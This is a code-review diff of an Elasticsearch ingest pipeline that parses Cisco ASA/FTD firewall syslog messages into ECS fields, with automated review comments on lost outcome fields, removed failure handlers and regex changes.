@@ -224,84 +210,44 @@ processors: # Firewall messages # # This set of messages is shared between FTD and ASA. - - set: - if: 'ctx._temp_?.cisco?.message_id != ""' - field: "event.action" - value: "firewall-rule" - dissect: if: "ctx._temp_.cisco.message_id == '106001'" - tag: "dissect_message_id_106001" + tag: parse_106001 field: "message" description: "106001" - pattern: "%{network.direction} %{network.transport} connection %{event.outcome} from %{source.address}/%{source.port} to %{destination.address}/%{destination.port} flags %{} on interface %{_temp_.cisco.source_interface}" - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" + pattern: "%{network.direction} %{network.transport} connection denied from %{source.address}/%{source.port} to %{destination.address}/%{destination.port} flags %{} on interface %{_temp_.cisco.source_interface}" - dissect: if: "ctx._temp_.cisco.message_id == '106002'" - tag: "dissect_message_id_106002" + tag: parse_106002 field: "message" description: "106002" - pattern: "%{network.transport} Connection %{event.outcome} by %{network.direction} list %{_temp_.cisco.list_id} src %{source.address} dest %{destination.address}" - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" + pattern: "%{network.transport} Connection denied by %{network.direction} list %{_temp_.cisco.list_id} src %{source.address} dest %{destination.address}" - dissect: if: "ctx._temp_.cisco.message_id == '106006'" - tag: 
"dissect_message_id_106006" + tag: parse_106006 field: "message" description: "106006" - pattern: "%{event.outcome} %{network.direction} %{network.transport} from %{source.address}/%{source.port} to %{destination.address}/%{destination.port} on interface %{_temp_.cisco.source_interface}" - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" + pattern: "Deny %{network.direction} %{network.transport} from %{source.address}/%{source.port} to %{destination.address}/%{destination.port} on interface %{_temp_.cisco.source_interface}" - dissect: if: "ctx._temp_.cisco.message_id == '106007'" - tag: "dissect_message_id_106007" + tag: parse_106007 field: "message" description: "106007" - pattern: "%{event.outcome} %{network.direction} %{network.transport} from %{source.address}/%{source.port} to %{destination.address}/%{destination.port} due to %{network.protocol} %{}" - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" + pattern: "Deny %{network.direction} %{network.transport} from %{source.address}/%{source.port} to %{destination.address}/%{destination.port} due to %{network.protocol} %{}" - grok: if: "ctx._temp_.cisco.message_id == '106010'" - tag: "grok_message_id_106010" + tag: parse_106010 field: "message" description: "106010" patterns: - - "%{NOTSPACE:event.outcome} %{NOTSPACE:network.direction} ((protocol %{POSINT:network.iana_number})|%{NOTSPACE:network.transport}) src 
%{NOTSPACE:_temp_.cisco.source_interface}:%{NOTSPACE:source.address}/%{POSINT:source.port} (%{DATA})?dst %{NOTSPACE:_temp_.cisco.destination_interface}:%{NOTSPACE:destination.address}/%{POSINT:destination.port}(%{GREEDYDATA})?" - - "%{NOTSPACE:event.outcome} %{NOTSPACE:network.direction} ((protocol %{POSINT:network.iana_number})|%{NOTSPACE:network.transport}) src %{NOTSPACE:_temp_.cisco.source_interface}:%{NOTSPACE:source.address}(/%{POSINT:source.port})? (%{DATA})?dst %{NOTSPACE:_temp_.cisco.destination_interface}:%{NOTSPACE:destination.address}(/%{POSINT:destination.port})?(%{GREEDYDATA})?" - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" + - "Deny %{NOTSPACE:network.direction} ((protocol %{POSINT:network.iana_number})|%{NOTSPACE:network.transport}) src %{NOTSPACE:_temp_.cisco.source_interface}:%{NOTSPACE:source.address}/%{POSINT:source.port} (%{DATA})?dst %{NOTSPACE:_temp_.cisco.destination_interface}:%{NOTSPACE:destination.address}/%{POSINT:destination.port}(%{GREEDYDATA})?" + - "Deny %{NOTSPACE:network.direction} ((protocol %{POSINT:network.iana_number})|%{NOTSPACE:network.transport}) src %{NOTSPACE:_temp_.cisco.source_interface}:%{NOTSPACE:source.address}(/%{POSINT:source.port})? (%{DATA})?dst %{NOTSPACE:_temp_.cisco.destination_interface}:%{NOTSPACE:destination.address}(/%{POSINT:destination.port})?(%{GREEDYDATA})?" 
- dissect: if: "ctx._temp_.cisco.message_id == '106013'" - tag: "dissect_message_id_106013" + tag: parse_106013 field: "message" description: "106013" pattern: "Dropping echo request from %{source.address} to PAT address %{destination.address}" - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" - set: if: "ctx._temp_.cisco.message_id == '106013'" field: "network.transport" 
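Review bot: The rewritten 106001–106016 patterns (from `parse_106001` onward in this hunk) replace the `%{event.outcome}` capture with the literal `denied`/`Deny`, so `event.outcome` is no longer populated for these messages; dropping it is right as far as ECS goes (`Deny` was never a valid outcome), but with `event.type: [ info ]` now seeded for every document at the top of the pipeline, these denied flows are indexed as routine `info` unless a later processor sets `event.type: [ connection, denied ]` for these ids, and that processor, if it exists, is outside this hunk. The literal also tightens matching: a 106010/106014/106015 line whose first token is not exactly `Deny` now fails the grok, and since the per-processor `on_failure` blocks are removed here the failure surfaces only through whatever pipeline-level handler exists. Pairing each of these ids with an explicit `event.type` set, or keeping a capture such as `%{NOTSPACE:_temp_.cisco.action}` for later mapping, would make the denial visible in the indexed event.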
@@ -314,82 +260,63 @@ processors: value: inbound - grok: if: "ctx._temp_.cisco.message_id == '106014'" - tag: "grok_message_id_106014" + tag: parse_106014 field: "message" description: "106014" patterns: - - "%{NOTSPACE:event.outcome} %{NOTSPACE:network.direction} %{NOTSPACE:network.transport} src %{NOTSPACE:_temp_.cisco.source_interface}:%{NOTSPACE:source.address} (%{DATA})?dst %{NOTSPACE:_temp_.cisco.destination_interface}:(?[^ (]*)(%{GREEDYDATA})?" - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" + - "Deny %{NOTSPACE:network.direction} %{NOTSPACE:network.transport} src %{NOTSPACE:_temp_.cisco.source_interface}:%{NOTSPACE:source.address} (%{DATA})?dst %{NOTSPACE:_temp_.cisco.destination_interface}:(?[^ (]*)(%{GREEDYDATA})?" 
- grok: if: "ctx._temp_.cisco.message_id == '106015'" - tag: "grok_message_id_106015" + tag: parse_106015 field: "message" description: "106015" patterns: - - "%{NOTSPACE:event.outcome} %{NOTSPACE:network.transport} %{NOTSPACE} %{NOTSPACE} from %{IPORHOST:source.address}/%{POSINT:source.port} to %{IPORHOST:destination.address}/%{POSINT:destination.port} flags %{DATA} on interface %{NOTSPACE:_temp_.cisco.source_interface}" - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" + - "Deny %{NOTSPACE:network.transport} %{NOTSPACE} %{NOTSPACE} from %{IPORHOST:source.address}/%{POSINT:source.port} to %{IPORHOST:destination.address}/%{POSINT:destination.port} flags %{DATA} on interface %{NOTSPACE:_temp_.cisco.source_interface}" - dissect: if: "ctx._temp_.cisco.message_id == '106016'" - tag: "dissect_message_id_106016" + tag: parse_106016 field: "message" - pattern: "%{event.outcome} IP spoof from (%{source.address}) to %{destination.address} on interface %{_temp_.cisco.source_interface}" + pattern: "Deny IP spoof from (%{source.address}) to %{destination.address} on interface %{_temp_.cisco.source_interface}" description: "106016" - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" - dissect: if: "ctx._temp_.cisco.message_id == '106017'" - tag: "dissect_message_id_106017" + tag: parse_106017 field: "message" - pattern: "%{event.outcome} IP due to Land Attack from %{source.address} to %{destination.address}" + pattern: "Deny IP due to 
Land Attack from %{source.address} to %{destination.address}" description: "106017" - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" - dissect: if: "ctx._temp_.cisco.message_id == '106018'" + tag: parse_106018 field: "message" - pattern: "%{network.transport} packet type %{_temp_.cisco.icmp_type} %{event.outcome} by %{network.direction} list %{_temp_.cisco.list_id} src %{source.address} dest %{destination.address}" + pattern: "%{network.transport} packet type %{_temp_.cisco.icmp_type} denied by %{network.direction} list %{_temp_.cisco.list_id} src %{source.address} dest %{destination.address}" description: "106018" - dissect: if: "ctx._temp_.cisco.message_id == '106020'" + tag: parse_106020 field: "message" - pattern: "%{event.outcome} IP teardrop fragment (size = %{}, offset = %{}) from %{source.address} to %{destination.address}" + pattern: "Deny IP teardrop fragment (size = %{}, offset = %{}) from %{source.address} to %{destination.address}" description: "106020" - dissect: if: "ctx._temp_.cisco.message_id == '106021'" + tag: parse_106021 field: "message" - pattern: "%{event.outcome} %{network.transport} reverse path check from %{source.address} to %{destination.address} on interface %{_temp_.cisco.source_interface}" + pattern: "Deny %{network.transport} reverse path check from %{source.address} to %{destination.address} on interface %{_temp_.cisco.source_interface}" description: "106021" - dissect: if: "ctx._temp_.cisco.message_id == '106022'" + tag: parse_106022 field: "message" - pattern: "%{event.outcome} %{network.transport} connection spoof from %{source.address} to %{destination.address} on interface %{_temp_.cisco.source_interface}" + pattern: "Deny %{network.transport} connection 
spoof from %{source.address} to %{destination.address} on interface %{_temp_.cisco.source_interface}" description: "106022" - grok: if: "ctx._temp_.cisco.message_id == '106023'" + tag: parse_106023 field: "message" description: "106023" patterns: - - ^%{NOTSPACE:event.outcome} ((protocol %{POSINT:network.iana_number})|%{NOTSPACE:network.transport}) src %{NOTCOLON:_temp_.cisco.source_interface}:%{IPORHOST:source.address}(/%{NUMBER:source.port})?\s*(\(%{CISCO_USER_OR_SGT_SRC}\) )?dst %{NOTCOLON:_temp_.cisco.destination_interface}:%{IPORHOST:destination.address}(/%{NUMBER:destination.port})?%{DATA}by access-group "%{NOTSPACE:_temp_.cisco.list_id}" + - ^Deny ((protocol %{POSINT:network.iana_number})|%{NOTSPACE:network.transport}) src %{NOTCOLON:_temp_.cisco.source_interface}:%{IPORHOST:source.address}(/%{NUMBER:source.port})?\s*(\(%{CISCO_USER_OR_SGT_SRC}\) )?dst %{NOTCOLON:_temp_.cisco.destination_interface}:%{IPORHOST:destination.address}(/%{NUMBER:destination.port})?%{DATA}by access-group "%{NOTSPACE:_temp_.cisco.list_id}" pattern_definitions: - HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62}))*(\\.?|\\b)" + HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z\\-_]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z\\-_]{0,62}))*(\\.?|\\b)" IPORHOST: "(?:%{IP}|%{HOSTNAME})" NOTCOLON: "[^:]*" CISCO_USER_OR_SGT_SRC: (?:%{CISCO_USER:_temp_.cisco.source_user_or_sgt}|%{CISCO_SGT:_temp_.cisco.source_user_or_sgt}|\((?:%{CISCO_USER:_temp_.cisco.source_user_or_sgt}|%{CISCO_SGT:_temp_.cisco.source_user_or_sgt})\)) 
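Review bot: Removing the per-processor `on_failure` blocks across this hunk (106013 through 106023) means a grok or dissect miss now propagates to whatever handler the pipeline declares at the top level, which is outside this hunk; I would confirm that handler exists and still records `_ingest.on_failure_processor_tag`, otherwise the new `parse_NNNNNN` tags have nothing to surface them and an unparsed deny message becomes a silent visibility gap. The same patterns stop capturing `event.outcome` (the leading token is now the literal `Deny`), so the field has to be set from the message id by a later processor that is not visible here. The HOSTNAME character-class correction (`[0-9A-Za-z\\-_]` instead of `[0-9A-Za-z-_]`) is right, but because `pattern_definitions` are per processor the same edit is repeated in the 113029-113039, 302013/302015 inbound and outbound, 305012, 302020 and 313005 processors further down; a search of the whole file for the old form would show whether any copy was missed. The processors list begins before and continues after this hunk.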
@@ -397,56 +324,51 @@ processors: CISCO_SGT: (?:, *)?%{NUMBER}(?::%{WORD})? - dissect: if: "ctx._temp_.cisco.message_id == '106027'" + tag: parse_106027 field: "message" description: "106027" - pattern: '%{} %{event.outcome} src %{source.address} dst %{destination.address} by access-group "%{_temp_.cisco.list_id}"' + pattern: '%{} Deny src %{source.address} dst %{destination.address} by access-group "%{_temp_.cisco.list_id}"' - dissect: if: "ctx._temp_.cisco.message_id == '106100'" + tag: parse_106100 field: "message" description: "106100" - pattern: "access-list %{_temp_.cisco.list_id} %{event.outcome} %{network.transport} %{_temp_.cisco.source_interface}/%{source.address}(%{source.port})%{}-> %{_temp_.cisco.destination_interface}/%{destination.address}(%{destination.port})%{}" + pattern: "access-list %{_temp_.cisco.list_id} %{_temp_.outcome} %{network.transport} %{_temp_.cisco.source_interface}/%{source.address}(%{source.port})%{}-> %{_temp_.cisco.destination_interface}/%{destination.address}(%{destination.port})%{}" - dissect: - if: "ctx._temp_.cisco.message_id == '106102' || ctx._temp_.cisco.message_id == '106103'" + if: "ctx._temp_.cisco.message_id == '106102'" + tag: parse_106102 + field: "message" + description: "106102" + pattern: "access-list %{_temp_.cisco.list_id} %{_temp_.outcome} %{network.transport} for user %{user.name} %{_temp_.cisco.source_interface}/%{source.address}(%{source.port})%{}-> %{_temp_.cisco.destination_interface}/%{destination.address}(%{destination.port})%{}" + - dissect: + if: "ctx._temp_.cisco.message_id == '106103'" + tag: parse_106103 field: "message" description: "106103" - pattern: "access-list %{_temp_.cisco.list_id} %{event.outcome} %{network.transport} for user %{user.name} %{_temp_.cisco.source_interface}/%{source.address}(%{source.port})%{}-> %{_temp_.cisco.destination_interface}/%{destination.address}(%{destination.port})%{}" + pattern: "access-list %{_temp_.cisco.list_id} denied %{network.transport} for user %{user.name} 
%{_temp_.cisco.source_interface}/%{source.address}(%{source.port})%{}-> %{_temp_.cisco.destination_interface}/%{destination.address}(%{destination.port})%{}" - dissect: if: "ctx._temp_.cisco.message_id == '111004'" + tag: parse_111004 field: "message" description: "111004" - pattern: "%{source.address} end configuration: %{_temp_.cisco.cli_outcome}" - - set: - field: event.outcome - description: "111004" - value: "success" - if: "ctx._temp_.cisco.message_id == '111004' && ctx?._temp_?.cisco?.cli_outcome == 'OK'" - - set: - field: event.outcome - description: "111004" - value: "failure" - if: "ctx._temp_.cisco.message_id == '111004' && ctx?._temp_?.cisco?.cli_outcome == 'FAILED'" - - remove: - field: _temp_.cisco.cli_outcome - ignore_missing: true - - append: - field: event.type - description: "111004" - value: "change" - if: "ctx._temp_.cisco.message_id == '111004'" + pattern: "%{source.address} end configuration: %{_temp_.outcome}" - grok: if: "ctx._temp_.cisco.message_id == '111009'" + tag: parse_111009 description: "111009" field: "message" patterns: - "^%{NOTSPACE} '%{NOTSPACE:server.user.name}' executed %{NOTSPACE} %{GREEDYDATA:_temp_.cisco.command_line_arguments}" - grok: if: "ctx._temp_.cisco.message_id == '111010'" + tag: parse_111010 field: "message" description: "111010" patterns: - "User '%{NOTSPACE:server.user.name}', running %{QUOTEDSTRING} from IP %{IP:source.address}, executed %{QUOTEDSTRING:_temp_.cisco.command_line_arguments}" - grok: if: "ctx._temp_.cisco.message_id == '113004'" + tag: parse_113004 field: "message" description: "113004" patterns: 
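Review bot: The 111004 change drops the `set` processors that mapped `_temp_.cisco.cli_outcome` `OK`/`FAILED` to `event.outcome` `success`/`failure` and the `append` that added `change` to `event.type`, replacing them with a bare `%{_temp_.outcome}` capture. Unless a later processor outside this hunk re-derives both, configuration-change events lose the `event.type: change` classification that detection content typically keys on. `_temp_.outcome` also now appears to carry two vocabularies, whatever the 106100 and 106102 patterns capture (their 106103 sibling hard-codes `denied`) and `OK`/`FAILED` from 111004, so the shared normalisation has to handle both; a comment on the 111004 processor such as `# _temp_.outcome is OK/FAILED here, not the 106100-style verdict` would keep that visible. The processors list continues outside the hunk.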
@@ -455,9 +377,10 @@ processors: CISCO_USER: (?:\*\*\*\*\*|(?:(?:LOCAL\\)?(?:%{HOSTNAME}\\)?%{USERNAME}\$?(?:@%{HOSTNAME})?(?:, *%{NUMBER})?)) - grok: if: "ctx._temp_.cisco.message_id == '113005'" + tag: parse_113005 description: "113005" field: "message" - patterns: + patterns: - "AAA user %{AUTH} Rejected(%{SPACE})?: reason = %{REASON:_temp_.cisco.rejection_reason}(%{SPACE})?: server = %{IP:destination.address}(%{SPACE})?: user = ?%{CISCO_USER:source.user.name}(%{SPACE})?: user IP = %{IPORNONE}" pattern_definitions: AUTH: (authentication|authorization) @@ -466,6 +389,7 @@ processors: IPORNONE: (%{IP:source.address}|None) - grok: if: "ctx._temp_.cisco.message_id == '113012'" + tag: parse_113012 field: "message" description: "113012" patterns: @@ -474,6 +398,7 @@ processors: CISCO_USER: (?:\*\*\*\*\*|(?:(?:LOCAL\\)?(?:%{HOSTNAME}\\)?%{USERNAME}\$?(?:@%{HOSTNAME})?(?:, *%{NUMBER})?)) - grok: if: "ctx._temp_.cisco.message_id == '113015'" + tag: parse_113015 field: "message" description: "113015" patterns: 
@@ -484,44 +409,50 @@ processors: - dissect: if: "ctx._temp_.cisco.message_id == '113019'" + tag: parse_113019 field: "message" description: "113019" pattern: "Group = %{source.user.group.name}, Username = %{source.user.name}, IP = %{destination.address}, Session disconnected. Session Type: %{_temp_.cisco.session_type}, Duration: %{_temp_.duration_hms}, Bytes xmt: %{source.bytes}, Bytes rcv: %{destination.bytes}, Reason: %{event.reason}" - dissect: if: "ctx._temp_.cisco.message_id == '113021'" + tag: parse_113021 field: "message" description: "113021" pattern: "Attempted console login failed. User %{source.user.name} did NOT have appropriate Admin Rights." - dissect: if: "ctx._temp_.cisco.message_id == '113040'" + tag: parse_113040 field: "message" description: "113040" pattern: "Terminating the VPN connection attempt from %{source.user.group.name}. Reason: This connection is group locked to %{}." - grok: if: '["113029","113030","113031","113032","113033","113034","113035","113036","113038","113039"].contains(ctx._temp_.cisco.message_id)' + tag: parse_113029-113039 field: "message" description: "113029, 113030, 113031, 113032, 113033, 113034, 113035, 113036, 113038, 113039" patterns: - "Group <%{NOTSPACE:source.user.group.name}> User <%{CISCO_USER:source.user.name}> IP <%{IP:source.address}>" - "Group %{NOTSPACE:source.user.group.name} User %{CISCO_USER:source.user.name} IP %{IP:source.address}" pattern_definitions: - HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62}))*(\\.?|\\b)" + HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z\\-_]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z\\-_]{0,62}))*(\\.?|\\b)" IPORHOST: "(?:%{IP}|%{HOSTNAME})" CISCO_USER: (?:\*\*\*\*\*|(?:(?:LOCAL\\)?(?:%{HOSTNAME}\\)?%{USERNAME}\$?(?:@%{HOSTNAME})?(?:, *%{NUMBER})?)) - grok: if: '["302013", "302015"].contains(ctx._temp_.cisco.message_id)' + tag: parse_302013-302015 field: "message" description: "302013, 302015" patterns: - Built %{NOTSPACE:network.direction} 
%{GREEDYDATA:_temp_.var_302013_302015} - grok: if: '["302013", "302015"].contains(ctx._temp_.cisco.message_id) && ctx.network.direction == "inbound"' + tag: parse_302013-302015_inbound field: "_temp_.var_302013_302015" description: "inbound: 302013, 302015" patterns: - ^%{NOTSPACE:network.transport} connection %{NUMBER:_temp_.cisco.connection_id} for %{NOTCOLON:_temp_.cisco.source_interface}:%{IPORHOST:source.address}/%{NUMBER:source.port} \(%{IPORHOST:_temp_.natsrcip}/%{NUMBER:_temp_.cisco.mapped_source_port}\)(\(%{CISCO_USER_OR_SGT_SRC}\))? to %{NOTCOLON:_temp_.cisco.destination_interface}:%{NOTSPACE:destination.address}/%{NUMBER:destination.port} \(%{NOTSPACE:_temp_.natdstip}/%{NUMBER:_temp_.cisco.mapped_destination_port}\)(\(%{CISCO_USER_OR_SGT_DST}\))?( \(%{CISCO_USER:_temp_.cisco.termination_user}\))?%{GREEDYDATA} pattern_definitions: - HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62}))*(\\.?|\\b)" + HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z\\-_]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z\\-_]{0,62}))*(\\.?|\\b)" IPORHOST: "(?:%{IP}|%{HOSTNAME})" NOTCOLON: "[^:]*" CISCO_USER_OR_SGT_SRC: (?:%{CISCO_USER:_temp_.cisco.source_user_or_sgt}|%{CISCO_SGT:_temp_.cisco.source_user_or_sgt}|\((?:%{CISCO_USER:_temp_.cisco.source_user_or_sgt}|%{CISCO_SGT:_temp_.cisco.source_user_or_sgt})\)) 
@@ -533,12 +464,13 @@ processors: # https://www.cisco.com/c/en/us/td/docs/security/asa/syslog/b_syslog/syslogs3.html#con_4770603 - grok: if: '["302013", "302015"].contains(ctx._temp_.cisco.message_id) && ctx.network.direction == "outbound"' + tag: parse_302013-302015_outbound field: "_temp_.var_302013_302015" description: "outbound: 302013, 302015" patterns: - ^%{NOTSPACE:network.transport} connection %{NUMBER:_temp_.cisco.connection_id} for %{NOTCOLON:_temp_.cisco.destination_interface}:%{IPORHOST:destination.address}/%{NUMBER:destination.port} \(%{IPORHOST:_temp_.natdstip}/%{NUMBER:_temp_.cisco.mapped_destination_port}\)(\(%{CISCO_USER_OR_SGT_SRC}\))? to %{NOTCOLON:_temp_.cisco.source_interface}:%{NOTSPACE:source.address}/%{NUMBER:source.port} \(%{NOTSPACE:_temp_.natsrcip}/%{NUMBER:_temp_.cisco.mapped_source_port}\)(\(%{CISCO_USER_OR_SGT_DST}\))?( \(%{CISCO_USER:_temp_.cisco.termination_user}\))?%{GREEDYDATA} pattern_definitions: - HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62}))*(\\.?|\\b)" + HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z\\-_]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z\\-_]{0,62}))*(\\.?|\\b)" IPORHOST: "(?:%{IP}|%{HOSTNAME})" NOTCOLON: "[^:]*" CISCO_USER_OR_SGT_SRC: (?:%{CISCO_USER:_temp_.cisco.source_user_or_sgt}|%{CISCO_SGT:_temp_.cisco.source_user_or_sgt}|\((?:%{CISCO_USER:_temp_.cisco.source_user_or_sgt}|%{CISCO_SGT:_temp_.cisco.source_user_or_sgt})\)) 
@@ -547,34 +479,33 @@ processors: CISCO_SGT: (?:, *)?%{NUMBER}(?::%{WORD})? - dissect: if: "ctx._temp_.cisco.message_id == '303002'" + tag: parse_303002 field: "message" description: "303002" pattern: "%{network.protocol} connection from %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port}, user %{client.user.name} %{} file %{file.path}" - grok: if: "ctx._temp_.cisco.message_id == '305012'" + tag: parse_305012 field: "message" description: "305012" patterns: - Teardown %{DATA} %{NOTSPACE:network.transport} translation from %{NOTCOLON:_temp_.cisco.source_interface}:%{IPORHOST:source.address}/%{NUMBER:source.port}(\s*\(%{CISCO_USER:_temp_.cisco.source_username}\))? to %{NOTCOLON:_temp_.cisco.destination_interface}:%{IP:destination.address}/%{NUMBER:destination.port} duration %{DURATION:_temp_.duration_hms} pattern_definitions: + USERNAME: "[^@$]*" NOTCOLON: "[^:]*" - HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62}))*(\\.?|\\b)" + HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z\\-_]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z\\-_]{0,62}))*(\\.?|\\b)" IPORHOST: "(?:%{IP}|%{HOSTNAME})" - CISCO_USER: (?:\*\*\*\*\*|(?:(?:LOCAL\\)?(%{HOSTNAME}\\)?(?:%{USERNAME})?\$?(?:@%{HOSTNAME})?(?:, *%{NUMBER})?(?:%{NUMBER}:%{DATA})?)) + CISCO_USER: (?:\*\*\*\*\*|(?:(?:LOCAL\\)?(%{HOSTNAME}\\)?(?:%{USERNAME})\$?(?:@%{HOSTNAME})?(?:, *%{NUMBER})?(?:%{NUMBER}:%{DATA})?)) DURATION: "%{INT}:%{MINUTE}:%{SECOND}" - - set: - if: '["302020"].contains(ctx._temp_.cisco.message_id)' - field: "event.action" - value: "flow-creation" - description: "302020" - grok: if: "ctx._temp_.cisco.message_id == '302020'" + tag: parse_302020 field: "message" description: "302020" patterns: - "Built %{NOTSPACE:network.direction} %{NOTSPACE:network.protocol} connection for faddr (?:%{NOTCOLON:_temp_.cisco.source_interface}:)?%{ECSDESTIPORHOST}/%{NUMBER}\\s*(?:\\(%{CISCO_USER_OR_SGT_DST}\\) 
)?gaddr (?:%{NOTCOLON}:)?%{MAPPEDSRC}/%{NUMBER} laddr (?:%{NOTCOLON:_temp_.cisco.source_interface}:)?%{ECSSOURCEIPORHOST}/%{NUMBER}\\s*(?:\\(%{CISCO_USER_OR_SGT_SRC}\\) )?(type %{NUMBER:_temp_.cisco.icmp_type} code %{NUMBER:_temp_.cisco.icmp_code})?" pattern_definitions: - HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62}))*(\\.?|\\b)" + HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z\\-_]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z\\-_]{0,62}))*(\\.?|\\b)" IPORHOST: "(?:%{IP}|%{HOSTNAME})" NOTCOLON: "[^:]*" ECSSOURCEIPORHOST: "(?:%{IP:source.address}|%{HOSTNAME:source.domain})" 
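Review bot: The new `USERNAME: "[^@$]*"` override in the 305012 pattern_definitions replaces the built-in USERNAME class with one that also accepts whitespace, commas, parentheses and colons, and since every element of CISCO_USER after `%{USERNAME}` is optional, the greedy class swallows a trailing `, 123` SGT suffix into `_temp_.cisco.source_username` instead of leaving it to the `(?:, *%{NUMBER})?` alternative, as far as I can tell from the visible definition. Making `(?:%{USERNAME})` non-optional changes nothing here because `*` still matches the empty string. If usernames never contain whitespace, commas or parentheses, a tighter class such as `USERNAME: "[^@$,\\s()]*"` keeps the later alternatives reachable; otherwise a comment explaining why the broad class is needed would help the next reader. The removed `set event.action: flow-creation` for 302020 presumably moves to a central mapping, but that is not visible in this hunk.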
@@ -586,48 +517,51 @@ processors: CISCO_SGT: (?:, *)?%{NUMBER}(?::%{WORD})? - dissect: if: "ctx._temp_.cisco.message_id == '302022'" + tag: parse_302022 field: "message" description: "302022" pattern: "Built %{} stub %{network.transport} connection for %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} %{} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} %{}" - dissect: if: "ctx._temp_.cisco.message_id == '302023'" + tag: parse_302023 field: "message" description: "302023" pattern: "Teardown stub %{network.transport} connection for %{_temp_.cisco.source_interface}:%{source.address}/%{source.port} to %{_temp_.cisco.destination_interface}:%{destination.address}/%{destination.port} duration %{_temp_.duration_hms} forwarded bytes %{network.bytes} %{event.reason}" - grok: if: "ctx._temp_.cisco.message_id == '304001'" + tag: parse_304001 field: "message" description: "304001" patterns: - "(%{NOTSPACE:source.user.name}@)?%{IP:source.address}(\\(%{DATA}\\))? %{DATA} (%{NOTSPACE}@)?%{IPORHOST:destination.address}:%{GREEDYDATA:url.original}" - - set: - if: "ctx._temp_.cisco.message_id == '304001'" - field: "event.outcome" - description: "304001" - value: allowed - dissect: if: "ctx._temp_.cisco.message_id == '304002'" + tag: parse_304002 field: "message" description: "304002" - pattern: "Access %{event.outcome} URL %{url.original} SRC %{source.address} %{}EST %{destination.address} on interface %{_temp_.cisco.source_interface}" + pattern: "Access denied URL %{url.original} SRC %{source.address} %{}EST %{destination.address} on interface %{_temp_.cisco.source_interface}" - grok: if: "ctx._temp_.cisco.message_id == '305011'" + tag: parse_305011 field: "message" description: "305011" patterns: - Built %{NOTSPACE} %{NOTSPACE:network.transport} translation from 